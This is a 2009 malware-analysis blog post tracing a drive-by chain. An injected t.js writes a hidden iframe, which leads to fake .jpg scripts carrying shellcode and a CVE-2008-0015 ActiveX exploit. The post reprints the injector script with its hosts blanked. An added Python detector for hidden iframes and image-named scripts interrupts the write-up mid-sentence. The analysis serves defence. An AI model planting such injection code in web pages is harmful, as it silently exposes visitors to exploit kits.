Blog for hpHosts, and whatever else I feel like writing about ....

Thursday, 9 July 2009 - A quick analysis

I thought I'd give you guys a quick analysis of what (IP:, as mentioned by DNS-BH, actually does. The first thing we need to look at is the contents of t.js:

var s,siteUrl,tmpdomain;
// the array entries and the src/href URLs below are blanked in this post
var arydomain = new Array("","");
s = document.location+"";
tmpdomain = 0;
// tmpdomain becomes 1 when the current page URL contains any listed domain
// (note: the captured script stores the URL in s but tests siteUrl)
for(var i=0;i<arydomain.length; i++){
    if(siteUrl.indexOf(arydomain[i]) > -1){
        tmpdomain = 1;
    }
}
// the hidden iframe is only written when no listed domain matched
if(tmpdomain == 0){
    document.writeln("<iframe src= width=0 height=0></iframe>");
    document.write ('<script type="text/javascript" src=""></script><noscript><a href=""><img src=""/></a></noscript>');
}

From here, we can see that it loads an iFrame to ( - AS4134) only when tmpdomain is equal to zero, i.e. when the current URL does not match any of the entries in the arydomain array. That iFrame then loads another iFrame to index.htm, which contains:

<div id="DivID">
<script src='go.jpg'></script>
<script src='go1.jpg'></script>

You'll not be surprised to learn that these .jpg files aren't, in fact, .jpg files. go.jpg contains the shellcode:
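The two things worth checking when triaging a chain like this are the t.js pattern (a domain list compared against document.location, then a zero-sized iframe written into the page) and the index.htm pattern (script tags whose src ends in an image extension, backed by files whose bytes are not an image at all). The script below is an added example, not code from the post; the samples it scans are constructed to mirror the snippets quoted above, with placeholder hosts in place of the ones the post redacts, and the `go.jpg` bytes are made up for the test.

```python
import re

# Constructed sample modelled on the t.js quoted in the post; the host is a
# reserved .invalid placeholder, not the real redirector.
SAMPLE_TJS = '''var s,siteUrl,tmpdomain;
var arydomain = new Array("allowed-one.test","allowed-two.test");
s = document.location+"";
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++){
  if(s.indexOf(arydomain[i]) > -1){ tmpdomain = 1; }
}
if(tmpdomain == 0){
  document.writeln("<iframe src=http://redirector.invalid/ width=0 height=0></iframe>");
}
'''

# Constructed sample modelled on the index.htm quoted in the post.
SAMPLE_INDEX_HTM = '''<div id="DivID">
<script src='go.jpg'></script>
<script src='go1.jpg'></script>
'''

# Constructed bytes for a "go.jpg" that is really script text, and a real JPEG header.
SAMPLE_GO_JPG = b"var x = unescape('%u4141%u4141');\n"
SAMPLE_REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"

# An iframe with width or height set to 0 is invisible to the visitor.
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*\b(width|height)\s*=\s*['\"]?0\b", re.I)
# An iframe that only exists because script wrote it into the page.
WRITTEN_IFRAME = re.compile(r"document\.write(ln)?\s*\(.*<iframe", re.I | re.S)
# A script tag whose src claims to be an image.
SCRIPT_WITH_IMAGE_EXT = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?[^'\">\s]+\.(jpe?g|gif|png|bmp)\b", re.I)


def find_injection_indicators(text):
    """Return the names of the injection patterns present in a JS/HTML sample."""
    hits = []
    if HIDDEN_IFRAME.search(text):
        hits.append("hidden_iframe")
    if WRITTEN_IFRAME.search(text):
        hits.append("iframe_via_document_write")
    if SCRIPT_WITH_IMAGE_EXT.search(text):
        hits.append("script_src_with_image_extension")
    # The t.js trick: compare the current URL against a list and act on a miss.
    if "document.location" in text and ".indexOf(" in text:
        hits.append("url_allowlist_check")
    return hits


# File signatures for the image types a .jpg/.gif/.png URL should deliver.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
}


def sniff_type(data):
    """Classify bytes by signature; flag plain text that looks like script."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    head = data[:512]
    try:
        head.decode("ascii")
    except UnicodeDecodeError:
        return "unknown-binary"
    if re.search(rb"\b(var|function|unescape|eval|document)\b", head):
        return "script-text"
    return "text"


def triage(name, data):
    """Report whether a fetched resource's extension matches its real content."""
    declared = name.rsplit(".", 1)[-1].lower()
    actual = sniff_type(data)
    mismatch = declared in ("jpg", "jpeg", "gif", "png") and actual not in ("jpeg", "gif", "png")
    return {"name": name, "declared": declared, "actual": actual, "mismatch": mismatch}


if __name__ == "__main__":
    print("t.js:", find_injection_indicators(SAMPLE_TJS))
    print("index.htm:", find_injection_indicators(SAMPLE_INDEX_HTM))
    print(triage("go.jpg", SAMPLE_GO_JPG))
    print(triage("real.jpg", SAMPLE_REAL_JPG))
```

Run against a saved copy of a page and the files it pulls in, `find_injection_indicators` gives you something to alert on before any sandbox run, and `triage` catches the extension-versus-content lie without having to open the file in an analysis tool; the signature check is deliberately limited to the first bytes so it works on truncated captures too.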

If we run this through Wepawet (which saves us a lot of time), we see it grabs a file called svchost.exe from ( - AS4134), MD5: 78ffb67eb9e8ec2886fcb5e32c916333:

Detection for this is pretty good, with 28/41 vendors currently detecting it:

go1.jpg attempts a buffer overflow (CVE-2008-0015), and detection is, sadly, rubbish:

vURL Online -

hpHosts - 261 Domains listed resolving to: 59.34.197.

Microsoft Security Advisory (972890) - Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution

Google Diagnostic - AS4134

IE 0day exploit domains (constantly updated)

IE (msvidctl.dll) to 0-day attack (Google translation)

New MS 0-day ActiveX (MSVidCtl dll exploit)
